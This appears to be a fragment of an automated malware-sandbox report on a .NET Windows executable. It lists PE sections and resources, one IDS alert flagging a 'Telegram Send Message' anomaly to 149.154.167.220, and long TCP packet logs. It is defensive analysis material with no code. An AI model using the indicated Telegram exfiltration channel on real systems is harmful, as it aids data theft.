                                                                                                                                                                                                                                                                                                                  .text0x20000x2e31840x2e32008211b42c3a5ad581f5512ec327d60819unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  .rsrc0x2e60000xe1e0x10006074eba1016c42ee639af8650918af4dFalse0.47021484375data4.5714121500729075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  .reloc0x2e80000xc0x2007698a5e84e72d9040d4d6e4d7003f8e3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                  RT_ICON0x2e61300x7e8Device independent bitmap graphic, 48 x 96 x 4, image size 15360.5815217391304348
                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x2e69180x14data1.2
                                                                                                                                                                                                                                                                                                                  RT_VERSION0x2e692c0x308dataEnglishUnited States0.44458762886597936
                                                                                                                                                                                                                                                                                                                  RT_MANIFEST0x2e6c340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                                                  mscoree.dll_CorExeMain
                                                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                  2025-01-09T10:59:27.526160+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.460920149.154.167.220443TCP
                                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:00.734344959 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.951742887 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.951771021 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.951987028 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.960325003 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.960338116 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.572865009 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.572947025 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.578808069 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.578819990 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.579066038 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.624970913 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.631721020 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.679330111 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.827384949 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.827449083 CET44349735149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.827723980 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:06.835587978 CET49735443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.525880098 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.525902987 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.526000977 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.527940989 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.527951002 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.734900951 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.734926939 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.735064030 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.736772060 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.736823082 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.736910105 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.737314939 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.737329006 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.737921000 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.737935066 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.825469017 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.825484037 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.825589895 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.826066017 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.826077938 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.192713976 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.192959070 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.192970037 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.193988085 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.194075108 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.195173025 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.195235968 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.195317030 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.195322990 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.388360023 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.389483929 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.389503002 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.390537977 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.390611887 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.391060114 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.391118050 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.391267061 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.393644094 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.393920898 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.393940926 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.394984961 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.395045996 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.395483017 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.395539045 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.395699978 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.395706892 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.397440910 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.397763014 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.397773981 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.399758101 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.400538921 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.402559042 CET49736443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.402565956 CET44349736216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.435327053 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.437834978 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.453461885 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.453474045 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.453609943 CET44349741216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.453665972 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.453690052 CET49741443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.460575104 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.462351084 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.462366104 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.463447094 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.463509083 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.465065002 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.465126038 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.465264082 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.465270042 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.521301031 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707496881 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707529068 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707559109 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707585096 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707611084 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707654953 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.707766056 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.713572025 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.713624001 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.713634014 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.713700056 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.713749886 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.713757038 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.720040083 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.720207930 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.720217943 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.726422071 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.726489067 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.726497889 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.763520002 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.763670921 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.764019966 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.765338898 CET49742443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.765352964 CET44349742216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.797888041 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.797945976 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.797955990 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.798141956 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.798206091 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.798213005 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.803304911 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.803364992 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.803373098 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.809600115 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.809658051 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.809668064 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.815844059 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.816672087 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.816682100 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.822231054 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.822273970 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.822283983 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.828406096 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.828478098 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.828485966 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.834295034 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.834379911 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.834388971 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.840260983 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.840315104 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.840322971 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.846195936 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.846276045 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.846287966 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.852051020 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.852116108 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.852124929 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.857861042 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.857908964 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.857918024 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888396025 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888458014 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888468981 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888636112 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888664961 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888688087 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888693094 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888705015 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.888732910 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.889432907 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.889533043 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.889539957 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.894999981 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.895071983 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.895080090 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.901103973 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.901288986 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.901297092 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.906735897 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.906986952 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.906995058 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.912636042 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.912689924 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.912698984 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.917881012 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.917918921 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.917954922 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.917963982 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.918009043 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.923194885 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.928572893 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.928616047 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.928626060 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.928633928 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.928899050 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.933831930 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.938664913 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.938708067 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.938731909 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.938740015 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.938788891 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.943404913 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.947735071 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.947768927 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.947782040 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.947791100 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.947834015 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.951832056 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.955948114 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.955996990 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.956005096 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.959969997 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.959995031 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.960056067 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.960063934 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.960159063 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.963810921 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.967607975 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.967669964 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.967679024 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.971523046 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.971560955 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.971613884 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.971626997 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.971671104 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.975420952 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.977875948 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.977916002 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.977937937 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.977947950 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.978034019 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.980175972 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.982470989 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.982501984 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.982515097 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.982525110 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.982635021 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.984739065 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.987092972 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.987119913 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.987168074 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.987179041 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.987221956 CET49740443192.168.2.4216.58.206.68
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.989469051 CET44349740216.58.206.68192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:10.991688967 CET44349740216.58.206.68192.168.2.4
